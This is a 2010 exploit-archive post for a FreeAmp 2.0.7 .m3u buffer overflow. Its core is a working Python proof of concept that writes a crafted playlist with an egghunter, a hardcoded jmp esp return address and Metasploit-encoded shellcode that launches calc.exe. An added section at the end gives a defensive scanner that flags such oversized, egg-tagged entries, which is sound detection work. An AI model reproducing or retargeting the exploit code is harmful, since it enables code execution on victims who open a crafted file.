
[local exploits] - FreeAmp 2.0.7 .m3u Buffer Overflow

Posted on 11 December 2010

<pre>
==================================
FreeAmp 2.0.7 .m3u Buffer Overflow
==================================

# Exploit Title: FreeAmp 2.0.7 .m3u Buffer Overflow - Egghunter
# Google Dork: N/A
# Date: 11/12/2010
# Author: zota (Thanks to Andrew; andras.kabai@cert-hungary.hu)
# Software Link: http://letoltes.szoftverbazis.hu/bfc5ec1d5e80cee5b5d3f78459113ed93c51f649/4d03800a/freeamp-v2-0-7-JI2/freeampsetup_2_0_7.exe
# Version: 2.0.7
# Tested on: Windows XP SP3 HUN
# CVE : N/A

# Proof of concept: writes a 15000-byte playlist entry that overflows the
# .m3u parser. Bytes literals and binary mode are used so the file is written
# byte-for-byte under both Python 2 and Python 3.

filename = "crash.m3u"

# Tag the egghunter searches memory for; written twice back-to-back in front of the payload.
egg = b"H4CK"

# egghunter --> size 32 byte
egghunter = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             b"\xef\xb8\x48\x34\x43\x4b\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

padding = b"A" * 14654

# kernel32.dll
# 7c86467b --> jmp esp
eip = b"\x7b\x46\x86\x7c"

# 16 byte nop after eip
nop = b"C" * 16

# msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x00\x0a\x0d"  --> size 228 byte
payload = (
    b"\xdb\xcf\xd9\x74\x24\xf4\xba\xf0\x1b\xe7\xdb\x5b\x31\xc9" +
    b"\xb1\x33\x31\x53\x18\x03\x53\x18\x83\xc3\xf4\xf9\x12\x27" +
    b"\x1c\x74\xdc\xd8\xdc\xe7\x54\x3d\xed\x35\x02\x35\x5f\x8a" +
    b"\x40\x1b\x53\x61\x04\x88\xe0\x07\x81\xbf\x41\xad\xf7\x8e" +
    b"\x52\x03\x38\x5c\x90\x05\xc4\x9f\xc4\xe5\xf5\x6f\x19\xe7" +
    b"\x32\x8d\xd1\xb5\xeb\xd9\x43\x2a\x9f\x9c\x5f\x4b\x4f\xab" +
    b"\xdf\x33\xea\x6c\xab\x89\xf5\xbc\x03\x85\xbe\x24\x28\xc1" +
    b"\x1e\x54\xfd\x11\x62\x1f\x8a\xe2\x10\x9e\x5a\x3b\xd8\x90" +
    b"\xa2\x90\xe7\x1c\x2f\xe8\x20\x9a\xcf\x9f\x5a\xd8\x72\x98" +
    b"\x98\xa2\xa8\x2d\x3d\x04\x3b\x95\xe5\xb4\xe8\x40\x6d\xba" +
    b"\x45\x06\x29\xdf\x58\xcb\x41\xdb\xd1\xea\x85\x6d\xa1\xc8" +
    b"\x01\x35\x72\x70\x13\x93\xd5\x8d\x43\x7b\x8a\x2b\x0f\x6e" +
    b"\xdf\x4a\x52\xe5\x1e\xde\xe8\x40\x20\xe0\xf2\xe2\x48\xd1" +
    b"\x79\x6d\x0f\xee\xab\xc9\xff\xa4\xf6\x78\x97\x60\x63\x39" +
    b"\xfa\x92\x59\x7e\x02\x11\x68\xff\xf1\x09\x19\xfa\xbe\x8d" +
    b"\xf1\x76\xaf\x7b\xf6\x25\xd0\xa9\x95\xa8\x42\x31\x74\x4e" +
    b"\xe2\xd0\x88\x9a")

# Layout: filler, doubled egg tag, payload, filler up to the saved return
# address at offset 14907, jmp esp, nop sled, egghunter, filler to 15000 bytes.
buffer = (padding + egg + egg + payload
          + b"A" * (14907 - len(padding) - len(egg) - len(egg) - len(payload))
          + eip + nop + egghunter
          + b"D" * (15000 - 14907 - len(eip) - len(nop) - len(egghunter)))

with open(filename, 'wb') as textfile:
    textfile.write(buffer)

# http://1337db.com/ [2010-12-11]
</pre>
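From the defender's side, the layout above is easy to recognise in a playlist file: a single entry of roughly 15000 bytes with the egg tag written twice and raw shellcode bytes in it. The scanner below is an added example, not part of the original post; the 14907/15000-byte offsets and the doubled "H4CK" tag are taken from the PoC, while the `MAX_SANE_ENTRY` limit and both sample playlists are constructed for this example.

```python
# Added defensive example (not part of the original post): scan an .m3u
# playlist for entries of the size this PoC relies on. The 14907/15000-byte
# offsets and the doubled "H4CK" egg tag come from the PoC above; the
# MAX_SANE_ENTRY limit is an assumption chosen for this example.

MAX_SANE_ENTRY = 4096   # assumed: far above any real path, far below the overflow
EGG_TAG = b"H4CK"       # tag the egghunter searches for, doubled in the PoC


def parse_m3u(data):
    """Return the non-comment entries of a playlist as a list of bytes."""
    entries = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):   # #EXTM3U / #EXTINF directives
            continue
        entries.append(line)
    return entries


def scan_m3u(data):
    """Return (entry_index, finding, detail) tuples; an empty list is clean."""
    findings = []
    doubled = EGG_TAG * 2
    for i, entry in enumerate(parse_m3u(data)):
        if len(entry) > MAX_SANE_ENTRY:
            findings.append((i, "oversized_entry", len(entry)))
        if doubled in entry:
            findings.append((i, "doubled_egg_tag", entry.index(doubled)))
        # Control bytes never appear in a real path but do in encoded shellcode
        # (only \x00, \x0a and \x0d were excluded when the payload was encoded).
        ctrl = sum(1 for b in bytearray(entry) if b < 0x20 and b != 0x09)
        if ctrl:
            findings.append((i, "control_bytes", ctrl))
    return findings


# Constructed samples: a normal playlist, and a stand-in for the PoC file with
# the same 15000-byte layout but plain filler instead of shellcode.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Track\r\nC:\\Music\\track01.mp3\r\n"
SUSPECT = b"A" * 14654 + EGG_TAG * 2 + b"A" * (15000 - 14654 - 8) + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(sample))
```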
